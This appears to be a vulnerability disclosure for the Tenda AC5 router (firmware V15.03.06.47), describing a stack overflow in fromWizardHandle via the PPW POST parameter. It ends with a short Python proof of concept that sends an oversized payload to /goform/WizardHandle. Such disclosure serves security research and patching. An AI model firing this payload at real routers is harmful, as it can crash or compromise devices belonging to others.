Overview

• The device's official website: https://www.tenda.com.cn/product/overview/AC5.html
• Firmware download website: https://www.tendacn.com/download/detail-3793.html

Affected version

AC5 V1.0 V15.03.06.47

Vulnerability details

The Tenda AC5 V1.0 V15.03.06.47 firmware has a stack overflow vulnerability located in the fromWizardHandle function. This function accepts the WANTand WANS parameter from a POST request. Within case 2, this function accepts the PPW parameter from a POST request, which is assigned to decodePwd(pppoepwd, decode_pwd);. However, since the user has control over the input of PPW, the function decodePwd() leads to a buffer overflow. The user-supplied PPW can exceed the capacity of the decode_pwd array, thus triggering this security vulnerability.

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/WizardHandle"
payload = b"a"*1000

data = {"WANS":"0","WANT":"2","PPW": payload}
response = requests.post(url, data=data)
print(response.text)